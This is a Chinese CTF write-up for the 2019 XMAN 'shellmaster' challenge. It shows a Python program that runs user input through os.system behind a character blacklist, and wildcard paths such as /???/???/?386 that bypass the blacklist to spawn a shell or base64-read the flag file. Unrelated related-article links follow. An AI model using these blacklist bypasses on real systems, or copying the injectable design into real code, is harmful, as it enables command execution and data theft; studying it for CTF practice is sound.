题目源码

import sys
import osblack_list = ["$", "-", "_", "{", "}", "*", "2", "4"]#black_list = []def quit():os._exit(0)while True:sys.stdout.write("input:")sys.stdout.flush()cmd = raw_input().upper()for i in black_list:if i in cmd:print("black_list")quit()cmd += " 2>&1"print(cmd)print(os.system(cmd))
  • 如果没有黑名单的话,直接通过$0起一个shell即可
  • 现在存在黑名单,需要通过其他方法起shell
/usr/bin/i386
/usr/bin/x86_64

利用方式:以通配符?来匹配/usr/bin/中的文件

/???/???/?386
/???/???/?86?6?
  • 也可以在全部转成大写的时候直接读出来
/usr/bin/base64

利用方式:

/???/???/????6? flag.txt

不拿shell,直接读取flag文件,拿返回值直接base64解码即可。

当发现命令不能使用时,可以进/usr/bin/目录下查看能用的命令

https://r0co.top/passages/xman-shellmaster-wp/

shell中的"2>&1"是什么意思?

将输出到标准出错处理的信息,发送到标准输出中。

2019xman-shellmaster wp相关推荐

  1. [WP]使用ApacheCordova开发HTML5-WindowsPhone应用程序

    下载代码示例 这篇文章介绍 Apache 科尔多瓦,创建使用 HTML5 和 JavaScript,跨平台移动应用程序的框架,并显示了如何使用它为 Windows Phone 开发应用程序. Wind ...

  2. wp实例开发精品文章源码推荐

    qianqianlianmeng wp实例开发精品文章源码推荐 WP8 启动媒体应用         这个示例演示了如何选择正确的msAudioCategory类别的音像(AV)流来配置它作为一个音频 ...

  3. cocos2d-xna for win8源代码轻松移植cocos-xna for wp游戏

    无意间看到杨哥弄了一个cocos2d-xna for win8出来可惜没有放出源代码,我试着要了一下结果他没理我,各种画圈圈. 那我只好自己弄一个了,源代码放出大家供交流学习使用,像杨哥说的一样就是一 ...

  4. linux 更改wp版本号,代码实现移除 WordPress 版本号

    默认情况下,WordPress会在页头输出版本号,有一定安全隐患. 在当前主题的functions.php中添加以下代码,可同时移除feed和js/css中的WordPress版本号: // 同时删除 ...

  5. 图解 wp WordPress 文章 链接 在新窗口打开

    wp WordPress 文章 链接 在新窗口打开 因为wp默认是不在新窗口打开链接的,这对于我们这样习惯关窗口的人,用起来很不方便.其实改起来很简单,下面开始 一.打开外观,选择编辑 二.打开主题页 ...

  6. 正确设置语言,加速WP应用提交

            App Hub在7月18日进行了更新.有些用户反馈新增的默认语言选项有点令人费解.本文简单做个介绍,帮助开发者正确设置语言,加速WP应用提交快速.这次的系统更新后,App Hub可以检 ...

  7. wordpress必装的插件 wp最常用的十个插件

    wordpress是世界上著名的博客系统,简称wp.一般新安装完wordpress以后,往往需要首先安装一些插件,这样才可以使用wordpress的更多功能.wp最常用的十个插件有哪些呢,可能根据每个 ...

  8. WP老杨解迷:开发生态两极化和榜单乱象

    WP老杨解迷:开发生态两极化和榜单乱象 Windows Phone 自2013年的一片浪潮推动下,2014年终于开始引起了各大小CP们的注意,于是大量的产品开始乘风破浪一路涌进Windows Phon ...

  9. WordPress开发之WP Custom Register Login插件试用

    简介 WP Custom Register Login可以为你的WordPress网站前台增加注册.登录.找回密码的功能:你可以通过简码在任何页面上调用. 此外,该插件还支持设置自动通过用户的电子邮件 ...

  10. 逆天通用水印支持Winform,WPF,Web,WP,Win10。支持位置选择(9个位置 ==》[X])...

    常用技能:http://www.cnblogs.com/dunitian/p/4822808.html#skill 逆天博客:http://dnt.dkil.net 逆天通用水印扩展篇~新增剪贴板系列 ...

最新文章

  1. asp.net type=file前后台合作 在上传图片到服务器
  2. java map string stu_Java Map遍历的三种方式 | 学步园
  3. malloc,free,new,delete解析(原)
  4. Eclipse CDT Hello World工程makefile分析
  5. 用原生 JS 实现 MVVM 框架2——单向绑定
  6. 视觉设计_视觉设计:
  7. 论文浅尝 - AAAI2020 | 基于知识图谱进行对话目标规划的开放域对话生成技术
  8. 9.关于Unicode字符集
  9. C语言课后习题(53)
  10. xp mysql字符集与乱码_MySQL乱码的原因和设置UTF8数据格式的方法介绍-mysql教程-学派吧...
  11. Android usb主从模式切换(九)
  12. 新手进阶:巧用 macOS 帮助菜单?
  13. 【2000*】【Codeforces Round #518 (Div. 1) [Thanks, Mail.Ru!] B】Multihedgehog
  14. 粉丝关注数据库表的设计
  15. BABOK - 需求分析(Requirements Analysis)概述
  16. 小黑T61P 挂了,显卡门,维修经历跟踪
  17. Sublime Text3 Build 3207破解
  18. r语言提取cvs数据_r语言,csv数据,提取特定行
  19. Allegro174版本新功能介绍之和172版本兼容设置
  20. linux获取cpuid的命令,linux获取cpu id和disk id

热门文章

  1. 银行卡号判断 java_java 判断是否是银行卡号
  2. https://blog.csdn.net/qq_43412289
  3. Process finished with exit code -1073740791(0xC0000409) | Could not locate zlibwapi.dll.
  4. onkeyup和onafterpaste键盘输入限制
  5. vue截取一个字符串_字符串截取方法
  6. 电脑连不上网络,报红叉,网络适配器报黄色警告,错误代码56,解决办法
  7. 最新TIOBE编程语言排行:C语言第一,Python反超Java,挤进第二
  8. 【云原生|K8s系列第5篇】:实战使用Service暴露应用
  9. 马哥教育SRE第五周作业
  10. 股指跨期套利基础学习